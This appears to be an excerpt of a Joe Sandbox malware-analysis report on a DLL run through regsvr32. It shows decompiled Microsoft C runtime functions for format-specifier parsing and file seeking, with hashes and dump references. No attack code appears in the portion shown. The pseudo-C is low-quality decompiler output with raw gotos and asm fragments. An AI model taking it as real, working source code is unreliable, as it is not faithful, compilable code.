                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-192189897
                                                      • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                      • Instruction ID: 366f55b25be61a8d80973343189ccb34eb8cf05d0f6555861afeb0151a731927
                                                      • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                      • Instruction Fuzzy Hash: 1A414C72A0D6C28AE3B0DB24E8547BEB7E4F384345F600126E6D887AA9DB7DD541CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DC6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 28%
                                                      			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t204 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t204);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t205 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t205);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t184 + _t205 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                                      0x7fef9d3dc6b
                                                      0x7fef9d3dc77
                                                      0x7fef9d3dc7f
                                                      0x7fef9d3dc87
                                                      0x7fef9d3dc8b
                                                      0x7fef9d3dc93
                                                      0x7fef9d3dc9b
                                                      0x7fef9d3dcb0
                                                      0x7fef9d3dcbf
                                                      0x7fef9d3dcc9
                                                      0x7fef9d3dcd3
                                                      0x7fef9d3dcdd
                                                      0x7fef9d3dce7
                                                      0x7fef9d3dce9
                                                      0x7fef9d3dcf2
                                                      0x7fef9d3dcf6
                                                      0x7fef9d3dcff
                                                      0x7fef9d3dd03
                                                      0x7fef9d3dd0c
                                                      0x7fef9d3dd10
                                                      0x7fef9d3dd16
                                                      0x7fef9d3dd1e
                                                      0x7fef9d3dd27
                                                      0x7fef9d3dd3b
                                                      0x7fef9d3dd3d
                                                      0x7fef9d3dd4a
                                                      0x7fef9d3dd53
                                                      0x7fef9d3dd5c
                                                      0x7fef9d3dd66
                                                      0x7fef9d3dd6a
                                                      0x7fef9d3dd7f
                                                      0x7fef9d3dd88
                                                      0x7fef9d3dda0
                                                      0x7fef9d3dda2
                                                      0x7fef9d3ddaf
                                                      0x7fef9d3ddb8
                                                      0x7fef9d3ddba
                                                      0x7fef9d3ddc2
                                                      0x7fef9d3ddd7
                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-734865713
                                                      • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                      • Instruction ID: 2534415b6cec3e8c7a7064d8bee2958269565171124d4a2b4bf05b50673a9d36
                                                      • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                      • Instruction Fuzzy Hash: 4C411CB2A0C6C18AE3B0CB64E8447BEB7E0F384345F600125E6D987AA8DB7DD444CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DC41 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 28%
                                                      			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
				void* _t190;
				char* _t210;
				char* _t211;

				_a76 = 1;
				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0xf9d3dd05;
				if (_a1404 == 0x23) goto 0xf9d3dd12;
				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
				if (_a1404 == 0x2d) goto 0xf9d3dceb;
				if (_a1404 == 0x30) goto 0xf9d3dd20;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3dd2b;
				asm("bts eax, 0x7");
				goto 0xf9d3dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
				_t210 =  &_a1560;
				_a88 = E000007FE7FEF9D31E40(_t210);
				if (_a88 >= 0) goto 0xf9d3dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3dd83;
				_a88 = _t190 + _t210 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t211 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t211);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t190 + _t211 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}






                                                      0x7fef9d3dc41
                                                      0x7fef9d3dc61
                                                      0x7fef9d3dc6b
                                                      0x7fef9d3dc77
                                                      0x7fef9d3dc7f
                                                      0x7fef9d3dc87
                                                      0x7fef9d3dc8b
                                                      0x7fef9d3dc93
                                                      0x7fef9d3dc9b
                                                      0x7fef9d3dcb0
                                                      0x7fef9d3dcbf
                                                      0x7fef9d3dcc9
                                                      0x7fef9d3dcd3
                                                      0x7fef9d3dcdd
                                                      0x7fef9d3dce7
                                                      0x7fef9d3dce9
                                                      0x7fef9d3dcf2
                                                      0x7fef9d3dcf6
                                                      0x7fef9d3dcff
                                                      0x7fef9d3dd03
                                                      0x7fef9d3dd0c
                                                      0x7fef9d3dd10
                                                      0x7fef9d3dd16
                                                      0x7fef9d3dd1e
                                                      0x7fef9d3dd27
                                                      0x7fef9d3dd3b
                                                      0x7fef9d3dd3d
                                                      0x7fef9d3dd4a
                                                      0x7fef9d3dd53
                                                      0x7fef9d3dd5c
                                                      0x7fef9d3dd66
                                                      0x7fef9d3dd6a
                                                      0x7fef9d3dd7f
                                                      0x7fef9d3dd88
                                                      0x7fef9d3dda0
                                                      0x7fef9d3dda2
                                                      0x7fef9d3ddaf
                                                      0x7fef9d3ddb8
                                                      0x7fef9d3ddba
                                                      0x7fef9d3ddc2
                                                      0x7fef9d3ddd7
                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-734865713
                                                      • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                      • Instruction ID: 4e41d9db2091814ce308bd8b3badba688d1355b6a5e36393cab3bd2279fd69d5
                                                      • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                      • Instruction Fuzzy Hash: 01412AB2A0C6C286E7F09B64E8407BEB2E4F384346F600126D6CD876A9DB3ED444CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BDDA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t134 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t134);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t114 + _t134 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}





                                                      0x7fef9d3bdda
                                                      0x7fef9d3bdf2
                                                      0x7fef9d3bdf4
                                                      0x7fef9d3be01
                                                      0x7fef9d3be0a
                                                      0x7fef9d3be0c
                                                      0x7fef9d3be14
                                                      0x7fef9d3be29
                                                      0x7fef9d3be3a
                                                      0x7fef9d3be49
                                                      0x7fef9d3be53
                                                      0x7fef9d3be61
                                                      0x7fef9d3be6b
                                                      0x7fef9d3be71
                                                      0x7fef9d3be84
                                                      0x7fef9d3be91
                                                      0x7fef9d3be9d
                                                      0x7fef9d3bea5
                                                      0x7fef9d3beae
                                                      0x7fef9d3beb2
                                                      0x7fef9d3bebb
                                                      0x7fef9d3bed1
                                                      0x7fef9d3bee2
                                                      0x7fef9d3bef0
                                                      0x7fef9d3befc
                                                      0x7fef9d3bf04
                                                      0x7fef9d3bf17
                                                      0x7fef9d3bf28
                                                      0x7fef9d3bf36
                                                      0x7fef9d3bf42
                                                      0x7fef9d3bf4a
                                                      0x7fef9d3bf5a
                                                      0x7fef9d3bf6a
                                                      0x7fef9d3bf7a
                                                      0x7fef9d3bf8a
                                                      0x7fef9d3bf9a
                                                      0x7fef9d3bfaa
                                                      0x7fef9d3bfac
                                                      0x7fef9d3bfae
                                                      0x7fef9d3bfb9
                                                      0x7fef9d3bfbe
                                                      0x7fef9d3bfc7
                                                      0x7fef9d3bfcb
                                                      0x7fef9d3bfd1
                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-192189897
                                                      • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                      • Instruction ID: 25f4969c447c8d4d660c638a7323c6370fe89c3a0b7b258112d187f79a668fd6
                                                      • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                      • Instruction Fuzzy Hash: ED416E72A0DAC28AE3F0DB24E8547BEB7E4E384345F600126D6DD869A9DB7ED140CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DD88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t114;
				char* _t134;

				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t134 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t134);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t114 + _t134 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}





                                                      0x7fef9d3dd88
                                                      0x7fef9d3dda0
                                                      0x7fef9d3dda2
                                                      0x7fef9d3ddaf
                                                      0x7fef9d3ddb8
                                                      0x7fef9d3ddba
                                                      0x7fef9d3ddc2
                                                      0x7fef9d3ddd7
                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-734865713
                                                      • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                      • Instruction ID: 6afb929124b84414141dd4680376ccf7afecd9c4b7d6d92296aea7179b7f5a27
                                                      • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                      • Instruction Fuzzy Hash: 024109A2A0C6C286E7F09B64E8447BEB6E4F394346F600126D6CD876A5DB3ED444DF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D39520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                                      • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                      • API String ID: 275287319-2412454244
